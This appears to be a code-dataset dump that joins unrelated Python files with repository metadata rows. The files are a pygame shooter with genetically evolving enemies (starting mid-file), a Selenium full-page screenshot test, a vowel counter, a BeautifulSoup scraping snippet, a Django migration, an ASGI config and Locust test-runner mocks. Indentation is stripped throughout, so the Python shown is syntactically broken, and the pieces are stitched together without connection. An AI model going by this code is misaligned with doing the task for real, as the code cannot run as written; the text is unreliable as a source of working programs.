bottom_shield = Enemy_Shields(0, enemy_ship_x+10, enemy_ship_y+65, chromosome,self.enemy_ship_tag)
all_sprites_list.add(bottom_shield)
enemy_shield_list.add(bottom_shield)
self.bottom_shield = bottom_shield
# Give enemy top shield
if self.chromosome[3] == 1:
top_shield = Enemy_Shields(1,enemy_ship_x+10,enemy_ship_y-10,chromosome,self.enemy_ship_tag)
all_sprites_list.add(top_shield)
enemy_shield_list.add(top_shield)
self.top_shield = top_shield
# Give enemy left shield
if self.chromosome[4] == 1:
left_shield = Enemy_Shields(2,enemy_ship_x-15,enemy_ship_y-10,chromosome,self.enemy_ship_tag)
all_sprites_list.add(left_shield)
enemy_shield_list.add(left_shield)
self.left_shield = left_shield
# Give enemy right shield
if self.chromosome[5] == 1:
right_shield = Enemy_Shields(3,enemy_ship_x+110,enemy_ship_y-10,chromosome,self.enemy_ship_tag)
all_sprites_list.add(right_shield)
enemy_shield_list.add(right_shield)
self.right_shield = right_shield
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Enemy_Ship.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_000.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_004.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_005.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_007.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_009.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_011.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_013.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_016.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_017.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_019.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Ship6_Explosion_021.png'))
self.index = 0
self.image = self.images[self.index]
self.rect = pygame.Rect(enemy_ship_x,enemy_ship_y,self.image.get_rect()[2]-10,self.image.get_rect()[3]-25)
# Update function is called once every frame
def update(self,screen):
global ENEMY_MISSILE_TIMER
# Change index for animation of projectile moving forward
self.index += 1
# Move enemy left/right depending on the location of the sprite on screen
if self.move_enemy == True:
if self.move_left == True:
# Stop sprite from moving off screen left
if self.rect.x < 15:
self.move_left = False
self.rect.x = self.rect.x - 3
else:
# Stop sprite from moving off screen right
if self.rect.x > 890:
self.move_left = True
self.rect.x = self.rect.x + 3
# Fire projectiles at a time interval if enemy can shoot
# This time interval decreases as game difficulty increases
if pygame.time.get_ticks() - self.enemy_fire_timer >= ENEMY_MISSILE_TIMER and self.chaingun_enemy == True:
enemy_projectile = Enemy_Projectile(self.enemy_ship_tag,self.rect.x+75,self.rect.y+75)
enemy_projectile_list.add(enemy_projectile)
all_sprites_list.add(enemy_projectile)
self.enemy_fire_timer = pygame.time.get_ticks()
# Increase the fitness value of enemies survived for more than 5 seconds
# The longer the enemy survives, the higher the fitness
if pygame.time.get_ticks() - self.enemy_survive_timer >= 5000:
self.fitness_value = self.fitness_value + 2
self.chromosome[6] = self.fitness_value
self.enemy_survive_timer = pygame.time.get_ticks()
# Called when player projectile hits enemy or enemy projectile hits player
def update_fitness(self,Message):
global GENERATE_GAME_OBJECTS
# When player projectile hits enemy shield
if Message == 'Shield_Hit':
# Reduce fitness value by one and assign new fitness to chromosome
self.fitness_value = self.fitness_value - 1
if self.fitness_value < 0:
self.fitness_value = 0
self.chromosome[6] = self.fitness_value
# When player projectile hits enemy
elif Message == 'Enemy_Hit':
# Destroy shields of enemy hit
shield_type_list = [self.bottom_shield,self.top_shield,self.left_shield,self.right_shield]
for shield in shield_type_list:
if enemy_shield_list.has(shield):
enemy_shield_list.remove(shield)
all_sprites_list.remove(shield)
# Reduce fitness value by two and assign new fitness to chromosome
self.fitness_value = self.fitness_value - 2
if self.fitness_value < 0:
self.fitness_value = 0
self.chromosome[6] = self.fitness_value
# Regenerate game objects if all enemies are destroyed
if len(enemy_list) == 0:
GENERATE_GAME_OBJECTS = True
# When enemy projectile hits player
elif Message == 'Player_Hit':
# Increase fitness value by two and assign new fitness to chromosome
self.fitness_value = self.fitness_value+4
self.chromosome[6] = self.fitness_value
# Regenerate game objects if player is destroyed
GENERATE_GAME_OBJECTS = True
# *****************************************************************************
# Creates Enemy Shields class
# *****************************************************************************
class Enemy_Shields(pygame.sprite.Sprite):
# Initialize the class and the sprites
def __init__(self,shield_index,shield_x,shield_y,chromosome,enemy_ship_tag):
super().__init__()
self.images = []
self.move_enemy = False
self.move_left = True
self.shield_index = shield_index
self.enemy_ship_tag = enemy_ship_tag
# Give enemy ability to move
if chromosome[1] == 1:
self.move_enemy = True
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_bottom.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_top.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_left.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Enemy_shield_right.png'))
self.index = shield_index
self.image = self.images[self.index]
self.rect = pygame.Rect(shield_x,shield_y,self.image.get_rect()[2],self.image.get_rect()[3])
# Update function is called once every frame
def update(self,surface):
# Move enemy shield left/right depending on the location of the sprite on screen
if self.move_enemy == True:
if self.move_left == True:
if self.shield_index == 2 and self.rect.x < 0:
self.move_left = False
elif self.shield_index == 3 and self.rect.x < 125:
self.move_left = False
elif (self.shield_index == 0 or self.shield_index == 1) and self.rect.x < 25:
self.move_left = False
self.rect.x = self.rect.x - 3
else:
if self.shield_index == 2 and self.rect.x > 874:
self.move_left = True
elif self.shield_index == 3 and self.rect.x > 999:
self.move_left = True
elif (self.shield_index == 0 or self.shield_index == 1) and self.rect.x > 899:
self.move_left = True
self.rect.x = self.rect.x + 3
# *****************************************************************************
# Creates Enemy Projectile class
# *****************************************************************************
class Enemy_Projectile(pygame.sprite.Sprite):
# Initialize the class and the sprites
def __init__(self,enemy_ship_tag,enemy_projectile_x,enemy_projectile_y):
super().__init__()
self.images = []
self.enemy_ship_tag = enemy_ship_tag
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_000.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_001.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_002.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_003.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_004.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_005.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_006.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_007.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_008.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Flying_009.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_000.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_001.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_002.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_003.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_004.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_005.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_006.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_007.png'))
self.images.append(pygame.image.load('Sprites/Enemy_Ship/Missile_1_Explosion_008.png'))
self.index = 0
self.image = self.images[self.index]
self.rect = pygame.Rect(enemy_projectile_x,enemy_projectile_y,self.image.get_rect()[2],self.image.get_rect()[3])
# Update function is called once every frame
def update(self,surface):
# Change index for animation of projectile moving forward
self.index += 1
if self.index > 9:
self.index = 0
# Move sprite forward
self.rect.y = self.rect.y + 2
# Assign index of sprite
self.image = self.images[self.index]
# Called once an enemy projectile hits player
def enemy_projectile_explosion(self):
# Draws an explosion on the location of collision
self.index = 15
self.rect.x = self.rect.x-25
self.rect.y = self.rect.y
self.image = self.images[self.index]
enemy_projectile_list.draw(screen)
pygame.display.update()
# *****************************************************************************
# Creates Star Field class
# *****************************************************************************
class Star_Field(pygame.sprite.Sprite):
# Initialize the class and the sprites
def __init__(self,star_pos_x,star_pos_y):
super().__init__()
self.images = []
self.images.append(pygame.image.load('Sprites/Star_Field/star.png'))
self.index = 0
self.image = self.images[self.index]
self.rect = pygame.Rect(star_pos_x,star_pos_y, self.image.get_rect()[2],
self.image.get_rect()[3])
# Update function is called once every frame
def update(self,surface):
# Move sprite forward
self.rect.y = self.rect.y + 2
# Detroy game object once it is out of screen
if self.rect.y > 768:
star_field_list.remove(self)
# Start game clock to synchronize events
clock = pygame.time.Clock()
# *****************************************************************************
# Called when Start Game is selected from Main Menu
# *****************************************************************************
def play_function():
# Global variables
global RUN_GAME
global GENERATE_GAME_OBJECTS
global clock
global STAR_FIELD_TIMER
global EPISODE_COUNT
global PLAYER_TORPEDO_FIRING_RATE
global MUTATION_RATE
global COLOR_BLACK
# Disable and reset Main Menu
main_menu.disable()
main_menu.reset(1)
#Initialize variables
EPISODE_COUNT = 0
GENERATE_GAME_OBJECTS = True
current_enemy_population = initial_population
# Run Game loop
while RUN_GAME:
# Set Frame Rate to 60 FPS
clock.tick(60)
if GENERATE_GAME_OBJECTS == True:
# Clear existing game objects
player_list.empty()
all_sprites_list.empty()
player_projectile_list.empty()
enemy_projectile_list.empty()
enemy_list.empty()
enemy_shield_list.empty()
# Print Episode no and Mutation Rate on screen
episode_info_count = episode_info_text.render('Episode:'+str(EPISODE_COUNT), 1, COLOR_WHITE)
episode_info_mutation_rate = episode_info_text.render('Mutation Rate:'+str(MUTATION_RATE), 1, COLOR_WHITE)
EPISODE_COUNT = EPISODE_COUNT + 1
# Generating game objects and necessary sprite groups
genetic_algorithm = Genetic_Algorithm(current_enemy_population, MUTATION_RATE, chromosome_length)
generated_population = genetic_algorithm.generate_new_population()
player = Player(512, 650)
selected_chromosome_list=[]
no_of_chromosomes_to_be_selected=4
# Selecting 4 unique chromosome indices from a population of 6
# This loop runs until four unique chromosome indices are selected
while True:
if no_of_chromosomes_to_be_selected == 0:
break
selected_chromosome_index=random.randint(0, 5)
if selected_chromosome_list.count(selected_chromosome_index) == 0:
selected_chromosome_list.append(selected_chromosome_index)
no_of_chromosomes_to_be_selected = no_of_chromosomes_to_be_selected -1
enemy0 = Enemy_Ship(generated_population[selected_chromosome_list[0]], 100, 10, 0)
enemy1 = Enemy_Ship(generated_population[selected_chromosome_list[1]], 600, 140, 1)
enemy2 = Enemy_Ship(generated_population[selected_chromosome_list[2]], 200, 270, 2)
enemy3 = Enemy_Ship(generated_population[selected_chromosome_list[3]], 800, 400, 3)
enemy_ship_list = [enemy0, enemy1, enemy2, enemy3]
player_list.add(player)
all_sprites_list.add(player)
all_sprites_list.add(enemy0)
all_sprites_list.add(enemy1)
all_sprites_list.add(enemy2)
all_sprites_list.add(enemy3)
enemy_list.add(enemy0)
enemy_list.add(enemy1)
enemy_list.add(enemy2)
enemy_list.add(enemy3)
GENERATE_GAME_OBJECTS = False
# Check for Pygame events
playevents = pygame.event.get()
for event in playevents:
# Exit game if window is closed
if event.type == pygame.QUIT:
RUN_GAME = False
exit()
# Check if Space Bar is pressed
if event.type == pygame.KEYUP and event.key == pygame.K_SPACE:
# Fire no of projectiles according to player firing rate
# Player firing rate decreases as game difficulty increases
if len(player_projectile_list) < PLAYER_TORPEDO_FIRING_RATE:
player_projectile = Player_Projectile(player.rect.x + 25, player.rect.y - 35)
all_sprites_list.add(player_projectile)
player_projectile_list.add(player_projectile)
# If Esc key is pressed, enable Main Menu and remove game objects from screen
if event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE and main_menu.is_disabled():
main_menu.enable()
GENERATE_GAME_OBJECTS = False
# Exit this function and return to Main Loop on line 931
return
# Pass Pygame event to Main Menu
main_menu.mainloop(playevents)
# Generate the Star Field
# Creates Star sprites at random points on the screen
if pygame.time.get_ticks() - STAR_FIELD_TIMER >= 500:
for star in range(10):
star_x = random.randint(1, 1020)
star_y = random.randint(-1000, 0)
star0 = Star_Field(star_x, star_y)
star_field_list.add(star0)
STAR_FIELD_TIMER = pygame.time.get_ticks()
# Draw screen background and episode info
screen.fill(COLOR_BLACK)
screen.blit(episode_info_count, (850,5))
screen.blit(episode_info_mutation_rate, (850, 30))
# Call update functions of the sprite groups
star_field_list.update(screen)
all_sprites_list.update(screen)
# Check all the player projectiles for collisions with enemy
for projectile in player_projectile_list:
# If a projectile hits enemy or shield,
# 1. call relevant fitness update functions
# 2. draw explosion
# 3. remove colliding game objects from screen
# Tags are used to identify which object was hit
player_projectile_hit_enemy_list = pygame.sprite.spritecollide(projectile, enemy_list, True)
player_projectile_hit_enemy_shield_list = pygame.sprite.spritecollide(projectile, enemy_shield_list, True)
for enemy_hit in player_projectile_hit_enemy_list:
enemy_hit.update_fitness("Enemy_Hit")
projectile.player_projectile_explosion()
player_projectile_list.remove(projectile)
all_sprites_list.remove(projectile)
for shield_hit in player_projectile_hit_enemy_shield_list:
shield_enemy_list = enemy_ship_list
projectile.player_projectile_explosion()
for enemy in shield_enemy_list:
if enemy.enemy_ship_tag == shield_hit.enemy_ship_tag:
enemy.update_fitness("Shield_Hit")
player_projectile_list.remove(projectile)
all_sprites_list.remove(projectile)
# Remove player projectile if it is off screen
if projectile.rect.y < -20:
player_projectile_list.remove(projectile)
all_sprites_list.remove(projectile)
# Check all the enemy projectiles for collisions with player
for enemy_projectile in enemy_projectile_list:
enemy_projectile_hit_list = pygame.sprite.spritecollide(enemy_projectile, player_list, True)
# If a projectile hits player,
# 1. draw explosion
# 2. call relevant fitness update functions
# 3. remove colliding game objects from screen
for player_hit in enemy_projectile_hit_list:
enemy_projectile.enemy_projectile_explosion()
firing_enemy_list = enemy_ship_list
for enemy in firing_enemy_list:
if enemy.enemy_ship_tag == enemy_projectile.enemy_ship_tag:
enemy.update_fitness("Player_Hit")
enemy_projectile_list.remove(enemy_projectile)
all_sprites_list.remove(enemy_projectile)
# Remove enemy projectile if it is off screen
if enemy_projectile.rect.y > 768:
enemy_projectile_list.remove(enemy_projectile)
all_sprites_list.remove(enemy_projectile)
# Draw relevant sprite groups on screen and update
star_field_list.draw(screen)
all_sprites_list.draw(screen)
pygame.display.update()
# Used by menus to fill background color
def main_background():
screen.fill(COLOR_BACKGROUND)
# Change game difficulty
# Player firing rate and enemy firing rate will change according to difficulty
def change_game_difficulty(d):
global PLAYER_TORPEDO_FIRING_RATE
global ENEMY_MISSILE_TIMER
GAME_DIFFICULTY[0] = d
if GAME_DIFFICULTY[0]=='EASY':
PLAYER_TORPEDO_FIRING_RATE = 5
ENEMY_MISSILE_TIMER = 5000
elif GAME_DIFFICULTY[0]=='MEDIUM':
PLAYER_TORPEDO_FIRING_RATE = 3
ENEMY_MISSILE_TIMER = 3000
elif GAME_DIFFICULTY[0]=='HARD':
PLAYER_TORPEDO_FIRING_RATE = 1
ENEMY_MISSILE_TIMER = 1000
# Change mutation rate of the algorithm
def change_mutation_rate(d):
global MUTATION_RATE
MUTATION_RATE_MATRIX[0] = d
MUTATION_RATE = MUTATION_RATE_MATRIX[0]
# Main Menu of the game
main_menu = pygameMenu.Menu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size = 30,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
title = 'Main menu',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# About Menu where players can see information about the game
about_menu = pygameMenu.TextMenu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size_title = 30,
font_title = pygameMenu.fonts.FONT_8BIT,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
text_color = COLOR_BLACK,
text_fontsize = 20,
title = 'About',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# Help Menu where players can see information about game controls
help_menu = pygameMenu.TextMenu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size_title = 30,
font_title = pygameMenu.fonts.FONT_8BIT,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
text_color = COLOR_BLACK,
text_fontsize = 20,
title = 'Help',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# Play Menu where players can change game difficulty and mutation rate
play_menu = pygameMenu.Menu(screen,
bgfun = main_background,
color_selected = COLOR_RED,
font = pygameMenu.fonts.FONT_BEBAS,
font_color = COLOR_BLACK,
font_size = 30,
menu_alpha = 50,
menu_color = MENU_BACKGROUND_COLOR,
menu_color_title = COLOR_BLUE,
menu_height = int(SCREEN_HEIGHT * 0.6),
menu_width = int(SCREEN_WIDTH * 0.6),
onclose = PYGAME_MENU_DISABLE_CLOSE,
option_shadow = False,
title = 'Play menu',
window_height = SCREEN_HEIGHT,
window_width = SCREEN_WIDTH
)
# Calls play_function when Start Game is pressed
play_menu.add_option('Start Game', play_function)
# Selector to select game dificulty
# On change calls change_game_difficulty function
play_menu.add_selector('Select Game Difficulty', [('Easy', 'EASY'),
('Medium', 'MEDIUM'),
('Hard', 'HARD')],
onreturn = None,
onchange = change_game_difficulty)
# Selector to select mutation rate
# On change calls change_mutation_rate function
play_menu.add_selector('Select Mutation Rate', [('0.2', 0.2),
('0.4', 0.4),
('0.6', 0.6),
('0.8', 0.8),],
onreturn = None,
onchange = change_mutation_rate)
# Return to Main Menu when this option is selected
play_menu.add_option('Return to main menu', PYGAME_MENU_BACK)
# Adding options to the Main Menu
main_menu.add_option('Play Game', play_menu)
main_menu.add_option('Help', help_menu)
main_menu.add_option('About', about_menu)
main_menu.add_option('Quit', PYGAME_MENU_EXIT)
# Write the game info on About Menu
for line in ABOUT:
about_menu.add_line(line)
about_menu.add_line(PYGAMEMENU_TEXT_NEWLINE)
# Return to Main Menu when this option is selected
about_menu.add_option('Return to main menu', PYGAME_MENU_BACK)
# Write the game controls info on Help Menu
for line in HELP:
help_menu.add_line(line)
help_menu.add_line(PYGAMEMENU_TEXT_NEWLINE)
# Return to Main Menu when this option is selected
help_menu.add_option('Return to main menu', PYGAME_MENU_BACK)
# Main loop of the program
while True:
# Set Frame Rate to 60 FPS
clock.tick(60)
# Check for Pygame events
events = pygame.event.get()
# Exit game if window is closed
for event in events:
if event.type == pygame.QUIT:
exit()
# Pass Pygame event to Main Menu
main_menu.mainloop(events)
# Update screen
pygame.display.update()
| [
"noreply@github.com"
] | NeonInc.noreply@github.com |
20438ca260c2e4f2b4b61fc4b437bb30e8f75350 | 3645e93b899a53a74a456250d95fb63de19513bf | /test.py | 1a8ce91ae02c59b760d5184762f135f3f04d5f4a | [] | no_license | lafftar/headfull-browser-pagescreenshot | 82e41bef2518709de8512cb8f252b347318555c8 | e9ce7e5fa60d202ffbb3f19d05a436264d2bb8c0 | refs/heads/master | 2022-11-25T15:47:08.661774 | 2020-08-02T09:21:01 | 2020-08-02T09:21:01 | 284,429,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,586 | py | from re import sub
from time import time
from io import BytesIO
from PIL import Image
from main import init_chrome
from selenium.common.exceptions import NoSuchElementException
def calc_height_and_scrolls(scroll_height=3700, max_height=1000):
# when the scroll_height is not prime.
for ideal_height in range(max_height, 500, -1): # loop from highest val
num_scrolls = scroll_height / ideal_height
if num_scrolls.is_integer():
return {
"Ideal Height": int(ideal_height),
"Ideal Scroll Num": int(num_scrolls)
}
# should only come to this block if it can't find a whole number.
last_remainder = 1000
closest_nums = {}
for ideal_height in range(max_height, 500, -1):
num_scrolls = scroll_height / ideal_height
remainder = scroll_height % ideal_height
if remainder < last_remainder:
last_remainder = remainder
closest_nums = {
"Ideal Height": int(ideal_height),
"Ideal Scroll Num": int(num_scrolls)
}
if remainder == 1: # the lowest remainder we're gonna get from a prime num
break
return closest_nums
def save_full_page_screenshot(driver, output_path):
scroll_height = driver.execute_script("return "
"document.getElementById('content').scrollHeight")
# might be an optional thing
navbar_height = driver.execute_script("return document"
".getElementsByClassName('h100')[0].scrollHeight")
window_height = driver.execute_script("return window.innerHeight")
final_img_height = scroll_height
topmost_part = Image.open(BytesIO(driver.find_element_by_id("content").screenshot_as_png))
final_image = Image.new('RGB', (topmost_part.width, final_img_height))
final_image.paste(topmost_part, (0, 0))
ideal_nums = calc_height_and_scrolls(scroll_height)
ideal_height = ideal_nums['Ideal Height']
driver.set_window_size(1200, ideal_height)
paste_height = 0
next_part = 0
for scrolls in range(1, ideal_nums['Ideal Scroll Num'] + 1):
# Issue calculating scroll height. It's missing some items. I'm scrolling by height of the entire window.
# Account for height of top part of browser.
driver.execute_script(f"window.scrollTo(0, {(window_height - navbar_height) * scrolls});")
next_part = Image.open(BytesIO(driver.find_element_by_id("content").screenshot_as_png))
next_part = next_part.crop((0, navbar_height, topmost_part.width, next_part.height))
paste_height = (scrolls * next_part.height)
final_image.paste(next_part, (0, paste_height))
final_img_height = paste_height + next_part.height
final_image.crop((0, 0, next_part.width, final_img_height))
final_image.save(output_path)
def test():
driver = init_chrome()
driver.get("https://stackoverflow.com/questions/38987/how-do-i-merge-two-dictionaries-in-a-single-expression-in-python-taking-union-o?rq=1")
# get rid of coverings
try:
driver.find_element_by_xpath('//*[@id="openid-buttons"]/button[4]').click()
except NoSuchElementException:
pass
# make sure whatever you put here doesn't have special characters in it.
path = f"{sub('[^A-Za-z0-9]+', ' ', driver.title)}.jpg"
t1 = time()
save_full_page_screenshot(driver, path)
t2 = time()
print(t2-t1)
# hang the program to check the page
input()
driver.close()
driver.quit()
test() | [
"tibabalase@gmail.com"
] | tibabalase@gmail.com |
3186cf988967384dfea7e14a0e164a35f8ed2815 | 302336c942159316dde35428a12db42829ad3047 | /capture/asgi.py | 90a62ac86668a47ff5f5b497f9a4a1a2cf52e6a2 | [] | no_license | vishnuteja1000/django-photographer-website | d57a9ab937e6a87ddfca2c6f70a50fc3986809d2 | fe5b48bc95405ff38af78e48bade2341eff31432 | refs/heads/master | 2022-11-18T15:33:11.673418 | 2020-07-18T05:46:50 | 2020-07-18T05:46:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
ASGI config for capture project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'capture.settings')
application = get_asgi_application()
| [
"sajib1066@gmail.com"
] | sajib1066@gmail.com |
f4434d0474136df5cbcc1a860c3ed344ae31b615 | ee369616696694bd952e9271c9734dacb3955407 | /counting vowels in strings.py | 13ba9df1dd380aec28aae32721e6577ae8ac1d5b | [] | no_license | Shankar1528/Summer-Internship | a77efb614f3b4f77870f0f0ae46cf5162553dd1b | a844bb7612d28356b82759cdf1b83843811fae33 | refs/heads/master | 2022-10-24T13:35:34.864709 | 2020-06-17T07:38:11 | 2020-06-17T07:38:11 | 265,574,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | def vowel_count(str):
count = 0
vowel = set("aeiouAEIOU")
for alphabet in str:
if alphabet in vowel:
count = count + 1
print("No. of vowels :", count)
str = "GeeksforGeeks"
vowel_count(str)
| [
"noreply@github.com"
] | Shankar1528.noreply@github.com |
683dc7de73c620ecfe6cdae4bc85ed8c09f792b5 | 9fd876c0e04c58312d9a528df5f815128f3711be | /test/1_scrap_beauti_err1.py | 13d76cb4f2519cfe9cfbf0ca1873e28d8bfe15c7 | [] | no_license | Felixsh19/python_datamining | 2c9b6fa7f5f07faa04d02d644569d8c14c11601f | 12b76beb2115425e9c4983c36c1d089c0e9b3299 | refs/heads/master | 2021-01-20T14:24:00.288359 | 2017-06-03T12:57:41 | 2017-06-03T12:57:41 | 90,606,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | #网页可能不存在及服务器错误的情况
from urllib.request import urlopen
from urllib.error import HTTPError,URLError
from bs4 import BeautifulSoup
def getTitle(url): #捕捉异常
try:
html = urlopen(url)
except (HTTPError,URLError) as e:
return None
try:
bs0bj = BeautifulSoup(html.read())
title = bs0bj.body.h1
except AttributeError as e:
return None
return title
title = getTitle("http://www.pythonscraping.com/pages/page1.html")
if title == None:
print("page failed")
else:
print(title) | [
"noreply@github.com"
] | Felixsh19.noreply@github.com |
ac40d8d902f38f23ede1851f3b163c1ed72c880c | 2ebd8275f377e9993b69b10f2ccf3953bde3eeb8 | /genertic/recommendation/migrations/0008_populations_user.py | b7e2147b1c890c4ec220b9396f4f2a2ae51742cd | [] | no_license | Earnn/Recommendation-System | d5c614d316fb38a500723e8e7d6864fb0130efc4 | 59d32673db29091935d91c64c4ff021317d4947a | refs/heads/master | 2021-05-11T00:55:13.336966 | 2018-03-21T10:48:37 | 2018-03-21T10:48:37 | 118,313,960 | 0 | 1 | null | 2018-03-21T09:40:34 | 2018-01-21T07:29:10 | CSS | UTF-8 | Python | false | false | 611 | py | # Generated by Django 2.0.2 on 2018-03-06 16:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('recommendation', '0007_auto_20180306_2323'),
]
operations = [
migrations.AddField(
model_name='populations',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
]
| [
"akanip2@gmail.com"
] | akanip2@gmail.com |
4a37049bdd2a5eb1ab32b0f6c0feabcf07e1d909 | 0bc9bff4fd4bd72b0ad681b79f0e39cdb9fc9dc0 | /voximplant/management/commands/vox_call_list_download.py | 7ea6954170db7d549c13f6340aae7c904ee5af68 | [
"MIT"
] | permissive | telminov/django-voximplant | bc4fcb53147d9a318857b8213934217ebfc8fdef | a0165498d1727039e26f77724079033c252a3611 | refs/heads/master | 2020-05-22T01:16:43.631059 | 2017-09-13T04:41:47 | 2017-09-13T04:41:47 | 58,752,532 | 4 | 2 | null | 2017-09-13T04:41:48 | 2016-05-13T15:39:03 | Python | UTF-8 | Python | false | false | 395 | py | # coding: utf-8
from django.core.management.base import BaseCommand
from ... import tools
class Command(BaseCommand):
help = 'Get call list detail'
def add_arguments(self, parser):
parser.add_argument('--id', dest='call_list_id', type=int)
def handle(self, *args, **options):
call_list_id = options['call_list_id']
tools.call_list_download(call_list_id)
| [
"sergey@telminov.ru"
] | sergey@telminov.ru |
1818596c5ad8da3b50be846123ee1b1a949d7e0b | 6d86315ee2383e768ff6856b06271fcc116f5e1f | /tests/.locust/lib/python3.8/site-packages/locust/test/test_runners.py | d5b6ae3dba457863c37d9884fc0493a149a92020 | [
"MIT"
] | permissive | iDataist/Deploy-a-Flask-Machine-Learning-App-to-Azure-App-Services-with-a-CI-CD-Pipeline | 8663e4100f7890fcc9cd98e11fdfb86221f1be61 | adc580eebc0f1064a7b1fb23d150a2c6cd7a71ea | refs/heads/main | 2023-06-14T04:20:57.497234 | 2021-07-12T15:50:21 | 2021-07-12T15:50:21 | 363,522,798 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 64,875 | py | import mock
import unittest
import gevent
from gevent import sleep
from gevent.queue import Queue
import greenlet
import locust
from locust import runners, constant, LoadTestShape
from locust.main import create_environment
from locust.user import User, TaskSet, task
from locust.env import Environment
from locust.exception import RPCError, StopUser
from locust.rpc import Message
from locust.runners import (
LocalRunner,
WorkerNode,
WorkerRunner,
STATE_INIT,
STATE_SPAWNING,
STATE_RUNNING,
STATE_MISSING,
STATE_STOPPING,
STATE_STOPPED,
)
from locust.stats import RequestStats
from locust.test.testcases import LocustTestCase
NETWORK_BROKEN = "network broken"
def mocked_rpc():
class MockedRpcServerClient:
queue = Queue()
outbox = []
def __init__(self, *args, **kwargs):
pass
@classmethod
def mocked_send(cls, message):
cls.queue.put(message.serialize())
sleep(0)
def recv(self):
results = self.queue.get()
msg = Message.unserialize(results)
if msg.data == NETWORK_BROKEN:
raise RPCError()
return msg
def send(self, message):
self.outbox.append(message)
def send_to_client(self, message):
self.outbox.append((message.node_id, message))
def recv_from_client(self):
results = self.queue.get()
msg = Message.unserialize(results)
if msg.data == NETWORK_BROKEN:
raise RPCError()
return msg.node_id, msg
def close(self):
raise RPCError()
return MockedRpcServerClient
class mocked_options:
def __init__(self):
self.spawn_rate = 5
self.num_users = 5
self.host = "/"
self.tags = None
self.exclude_tags = None
self.master_host = "localhost"
self.master_port = 5557
self.master_bind_host = "*"
